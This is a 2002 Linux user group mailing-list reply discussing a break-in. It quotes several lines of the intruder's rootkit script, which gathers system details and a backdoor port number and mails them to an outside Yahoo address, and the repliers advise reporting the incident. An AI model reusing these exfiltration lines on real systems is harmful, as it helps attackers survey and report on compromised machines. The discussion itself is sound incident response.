[lug] i got hacked
Charles Morrison
cmorrison at greeleynet.com
Thu Apr 18 15:09:26 MDT 2002
D. Stimits wrote:
>>echo "* Spatiu Liber: $(df -h)" >> /tmp/info
>>
>
> Interesting, non-English like most of the web search URL's. I know .ru
> is Russia, anyone know what domain .ro is?
Romania
>
>
>>echo "* Ping la Yahoo: $(ping -c3 yahoo.com)" >> /tmp/info
>>echo "* Password: $(wc /etc/passwd -l)" >> /tmp/info
>>echo "* Portul rootkitului este 25897" >> /tmp/info
>>
>
> I am guessing this is the port used for backdoors, being sent to
> yahoo.com.
>
>
>>cat /tmp/info | mail -s "root dupa reboot" ryz_ro at yahoo.com
>>
>
This is a real goofup.
> VERY VERY IMPORTANT: Send this to both abuse at yahoo.com and the FBI. You
> probably can't prosecute, but it should be added to their database and
> knowledge. Yahoo.com should be told very explicitly to keep log
> information concerning that account in case authorities wish to see it,
> a crime has been comitted.
>
More information about the LUG
mailing list